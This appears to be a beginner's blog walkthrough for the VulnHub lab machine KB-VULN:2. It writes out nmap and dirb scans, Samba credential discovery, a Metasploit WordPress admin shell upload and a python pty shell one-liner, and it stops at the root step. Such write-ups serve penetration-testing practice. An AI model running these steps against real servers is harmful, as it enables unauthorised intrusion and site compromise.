Hello friend’s, hope all doing great as well. This is walkthrough for machine KB-VULN:2 which is good start for beginner’s, machine create by Machineboy and you can simply download it from vulnhub.

#Make sure that add machine address into hosts file.

#nmap

$nmap -sV kb.vuln
Nmap scan report for kb.vuln (192.168.1.6)
Host is up (0.00031s latency).
Not shown: 995 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
Service Info: Host: UBUNTU; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

tried anonymous login with ftp but doesn’t work, port 80 also open so run dirb and got following result.

$dirb http://kb.vuln

tried bruteforce to wordpress login, but no luck then notice Samba service and dig into it smb://kb.vuln and got username and password into backup.zip contain remerber_me.txt

Username:admin
Password:MachineBoy141

#exploitation

where got credentials can try different ways to upload backdoor, here is one of the simplest way to upload shell using metasploit-framework.

msf> use exploit/unix/webapp/wp_admin_shell_upload
msf> show options
msf> set rhosts kb.vuln //set all the required options
msf> run

#user

got shell..! so first flag kbadmin folder able to read using www-data user, as well as we already have credentials of kbadmin:MachineBoy141

use python tty python -c ‘import pty; pty.spawn(“/bin/sh”)’ cd /home/kbadmin and got user flag

#root

for root simply tried sudo -l

LEAVE A REPLY

Please enter your comment!
Please enter your name here